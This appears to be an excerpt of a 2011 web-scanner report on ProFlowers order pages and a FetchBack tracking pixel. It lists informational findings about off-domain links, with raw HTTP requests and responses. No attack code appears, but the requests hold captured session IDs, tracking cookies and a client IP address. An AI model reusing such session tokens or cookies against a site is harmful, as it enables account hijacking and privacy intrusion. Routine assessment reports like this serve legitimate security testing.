<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
r="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Future.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl00_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl01_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_s?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>
    <body id="OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br>
                               <IMG height="48" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/headers/HDR_WereSorry.gif" width="400" vspace="2" border="0">
                               <br>
...[SNIP]...
<td vAlign="top" align="left"><IMG height="32" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/images/op_YellowAlertIcon.gif" width="32" border="0">&nbsp;&nbsp;
                                                                   <span class="headline">
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>
    <body id="OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br>
                               <IMG height="48" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/headers/HDR_WereSorry.gif" width="400" vspace="2" border="0">
                               <br>
...[SNIP]...
<td vAlign="top" align="left"><IMG height="32" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/images/op_YellowAlertIcon.gif" width="32" border="0">&nbsp;&nbsp;
                                                                   <span class="headline">
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.16. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902899_11051:0_13981:207837_13479:207837_15758:367170_12704:367170_4895:795355_10164:1159631_10638:1159631_10640:1159631_10641:1159631_1437:1159631_1660:1723227; uid=1_1304902899_1303179323923:6792170478871670; kwd=1_1304902899_12936:207837_11317:1159631_11717:1159631_11718:1159631_11719:1159631; sit=1_1304902899_3006:34:0_3455:207837:207837_2988:430117:395946_3801:542560:542140_1714:827093:795355_3306:1054719:367170_719:1160458:1159631_2451:1211327:1206227_3236:1369290:1369172_782:1723576:1723227; cre=1_1304902899_29802:59536:1:541928_29805:59534:1:542589; bpd=1_1304902899_1ZCU5:4QNG; apd=1_1304902899; scg=1_1304902899; ppd=1_1304902899; afl=1_1304902899

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:08:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304903331_13521:0_11051:0_11051:432_13981:208269_13479:208269_15758:367602_12704:367602_4895:795787_10164:1160063_10638:1160063_10640:1160063_10641:1160063_1437:1160063_1660:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: uid=1_1304903331_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: kwd=1_1304903331_12936:208269_11317:1160063_11717:1160063_11718:1160063_11719:1160063; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: sit=1_1304903331_3006:466:0_3455:208269:208269_2988:430549:396378_3801:542992:542572_1714:827525:795787_3306:1055151:367602_719:1160890:1160063_2451:1211759:1206659_3236:1369722:1369604_782:1724008:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: cre=1_1304903331_29802:59536:1:542360_29805:59534:1:543021; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: bpd=1_1304903331_1ZunS:0_1ZCU5:4QUE; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: apd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: scg=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: ppd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: afl=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:08:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2321

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
<!-- matched campaign #13521 is eligible -->
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=46435;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
<img src="http://ads.undertone.com/fc.php?pid=1913&cb=[timestamp]" alt="" style="display: none;" border="0" height="1" width="1" />
<img src="http://pixel.rubiconproject.com/tap.php?v=5970|1|14" border="0" width="1" height="1" />
<!-- Fetchback Retargeting 645 -->
<img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B"/>
<!-- Google Code for 1800Flowers Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033375529/?label=LmmICKPn7gEQqZ7g7AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<img src="http://idcs.interclick.com/Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08"/>
<!-- "1800Flowers" c/o "FetchBack", segment: '1800Flowers Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://at.amgdgt.com/ads/?t=pp&px=15038&rnd=$timestamp" width="1" height="1" border="0"/>
<script src="http://ad.adtegrity.net/pixel?id=972818&t=1" type="text/javascript"></script>
...[SNIP]...
16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
